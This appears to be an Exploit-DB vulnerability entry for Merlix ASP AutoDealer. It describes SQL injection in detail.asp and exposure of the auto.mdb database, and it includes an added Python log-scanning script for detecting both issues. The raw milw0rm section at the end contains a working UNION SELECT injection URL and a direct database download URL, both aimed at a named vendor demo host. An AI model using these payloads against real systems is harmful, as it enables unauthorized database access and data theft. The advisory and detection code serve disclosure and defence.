Vendor: ASP AutoDealer
By: AlpHaNiX
CVSS: 7.5 (HIGH)
SQL Injection & Database Disclosure
CWE: 89, 200
Product Name: ASP AutoDealer
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Tunisia Muslim

The vulnerability exists because user-supplied input in the 'ID' parameter of the 'detail.asp' script is not sufficiently sanitized, so arbitrary SQL code can be injected to manipulate the application's SQL queries. The application also discloses the database file 'auto.mdb', which contains sensitive information.

Mitigation:

Validate user-supplied input to prevent SQL injection attacks. Sensitive information, such as the database file, should not be disclosed.
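
A log-triage sketch for the two issues described above, added here as an example and not part of the original advisory: it applies a digits-only allow-list to the `ID` parameter of `detail.asp` and flags any request for an `.mdb` file. The IIS W3C field layout, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C-style log lines (assumed field layout, not real traffic).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
2008-12-05 10:00:01 GET /autodealer/detail.asp ID=42 200
2008-12-05 10:00:07 GET /autodealer/detail.asp ID=-0+union+select+1,null+from+CDDOOR 200
2008-12-05 10:00:09 GET /autodealer/auto.mdb - 200
2008-12-05 10:00:12 GET /autodealer/auto.mdb - 404
2008-12-05 10:00:15 GET /autodealer/default.asp - 200
"""

ID_RE = re.compile(r"[0-9]{1,9}")  # allow-list: short run of ASCII digits only


def valid_id(raw):
    """Same check the application should apply before building its query."""
    return ID_RE.fullmatch(raw) is not None


def scan(log_text):
    """Return (finding, uri_stem, status) tuples for suspicious requests."""
    findings, fields = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        stem = rec.get("cs-uri-stem", "").lower()
        status = rec.get("sc-status", "")
        if stem.endswith("/detail.asp"):
            # ASP treats parameter names case-insensitively, so collect every spelling.
            query = parse_qs(rec.get("cs-uri-query", ""), keep_blank_values=True)
            ids = [v for k, vs in query.items() if k.lower() == "id" for v in vs]
            if len(ids) != 1 or not valid_id(ids[0]):
                findings.append(("invalid-id", stem, status))
        elif stem.endswith(".mdb"):
            # A 200 means the database file was actually served to the client.
            kind = "mdb-served" if status == "200" else "mdb-probe"
            findings.append((kind, stem, status))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

An `mdb-served` finding means the file left the server and its contents should be treated as exposed; `invalid-id` also fires when `ID` is missing or repeated.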

Exploit-DB raw data:

###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################


---------------------------- Tunisia Muslim ------------------------------

#found by : OffensiveTrack
#Author   : AlpHaNiX
#website  : www.offensivetrack.org

#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Merlix ASP AutoDealer
#download : null
#Demo     : http://demo.merlix.com/autodealer/



#Exploits :

--=[SQL INJECTION]=--
http://demo.merlix.com/autodealer/detail.asp?ID=-0+union+select+1,null,null,0,null,CDDoorID,null,null,null,null,CDDoorName,null,null,null,null,null,17+from+CDDOOR



--=[DATABASE DISCLOSURE]=--
http://demo.merlix.com/autodealer/auto.mdb


#Greetz For -|-Me!sTeR-|-

###########################################################################

# milw0rm.com [2008-12-05]